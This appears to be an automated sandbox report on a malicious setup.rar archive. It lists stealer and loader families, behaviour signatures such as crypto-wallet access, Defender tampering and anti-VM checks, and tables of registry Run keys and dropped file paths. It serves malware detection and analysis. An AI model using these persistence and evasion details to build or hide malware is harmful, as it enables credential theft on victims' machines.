Analysis Overview
SHA256
1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a
Threat Level: Known bad
The file setup.rar was found to be: Known bad.
Malicious Activity Summary
MetaSploit
RedLine Payload
Glupteba Payload
Modifies Windows Defender Real-time Protection settings
RedLine
Glupteba
Process spawned unexpected child process
Vidar
NetSupport
Suspicious use of NtCreateProcessExOtherParentProcess
Socelars
SmokeLoader
Raccoon
Nirsoft
Vidar Stealer
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
UPX packed file
Drops file in Drivers directory
Loads dropped DLL
Drops startup file
Checks BIOS information in registry
Themida packer
Reads user/profile data of web browsers
Looks up external IP address via web service
Checks whether UAC is enabled
Enumerates connected drives
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
Modifies system certificate store
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Script User-Agent
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: SetClipboardViewer
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Kills process with taskkill
Modifies Internet Explorer settings
Runs ping.exe
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-24 08:16
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
666s
Max time network
1766s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SETBF83.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SETBF83.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7753.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7753.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\2684263.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Fimypujudae.exe\"" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7753.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC99.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC88.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC89.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC99.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC88.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC89.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672} | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\MaskVPN\is-R427V.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-TB7D9.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-OD2AO.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-RHVF2.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-NG8IE.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-T81NQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe.config | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-ABP29.tmp | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\tmp.edb | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-I61CT.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-EB5PD.tmp | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-9P9R8.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-22V8Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-EFE95.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-5IVSQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3F2O1.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-LEEMT.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-88641.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-OFPSP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-CQ3K2.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-DOI9U.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-VI0SQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-OVGS0.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-9F42C.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-DL35H.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-V8TJB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-C35S0.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-L9M3Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-TE6KC.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-3DPO3.tmp | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIBA0A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3F77.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC382.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF63E847A9FECF1714.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Installer\f764ac1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC093.tmp | C:\Windows\system32\msiexec.exe | N/A |
